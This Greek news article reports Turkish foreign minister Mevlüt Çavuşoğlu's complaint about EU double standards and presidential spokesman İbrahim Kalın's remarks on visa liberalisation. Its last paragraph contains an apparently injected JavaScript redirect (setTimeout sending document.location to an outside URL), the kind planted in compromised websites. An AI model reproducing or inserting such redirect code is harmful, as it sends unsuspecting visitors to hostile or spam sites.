Τσαβούσογλου: Ο λαός πιέζει να σταματήσουμε τις ενταξιακές διαπραγματευσεις

0
4

 

Για την απογοήτευση των Τούρκων από τα «δύο μέτρα και δύο σταθμά» που εφαρμόζει η ΕΕ σε ό,τι αφορά τη χώρα τους μίλησε ο υπουργός Εξωτερικών Μεβλούτ Τσαβούσογλου.

Όπως τόνισε ο Τούρκος ΥΠΕΞ οι πολίτες ασκούν «τεράστια πίεση» στην κυβέρνησή τους να βάλει τέλος στις ενταξιακές διαπραγματεύσεις.

Ο Μεβλούτ Τσαβούσογλου κατηγόρησε την ΕΕ ότι απευθύνει επικρίσεις στους γείτονες, αλλά δεν δέχεται να επικρίνεται κι αυτή με τη σειρά της. Οι Τούρκοι απογοητεύθηκαν από το γεγονός ότι δεν έγιναν επισκέψεις ούτε δηλώσεις υποστήριξης μετά την απόπειρα πραξικοπήματος, σημείωσε.

«Ο τουρκικός λαός βλέπει τα δύο μέτρα και δύο σταθμά», δήλωσε ο Τσαβούσογλου σε ένα περιφερειακό φόρουμ για την ασφάλεια που διεξάγεται στο Μπλεντ της Σλοβενίας. «Δεχόμαστε τεράστια πίεση να σταματήσουμε τη διαδικασία της διαπραγμάτευσης», πρόσθεσε.

Εξάλλου στην Άγκυρα ο εκπρόσωπος του προέδρου Ρετζέπ Ταγίπ Ερντογάν, ο Ιμπραήμ Καλίν, δήλωσε πως είναι εκτός συζήτησης το ενδεχόμενο να καθυστερήσει μέχρι το τέλος του χρόνου η κατάργηση των θεωρήσεων εισόδου για τους Τούρκους πολίτες που επισκέπτονται την ΕΕ, προσθέτοντας πως απομένουν να ρυθμιστούν μόνο ήσσονος σημασίας θέματα.

Ο Καλίν δήλωσε πως πιστεύει ότι τα εναπομείναντα ζητήματα θα επιλυθούν σύντομα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here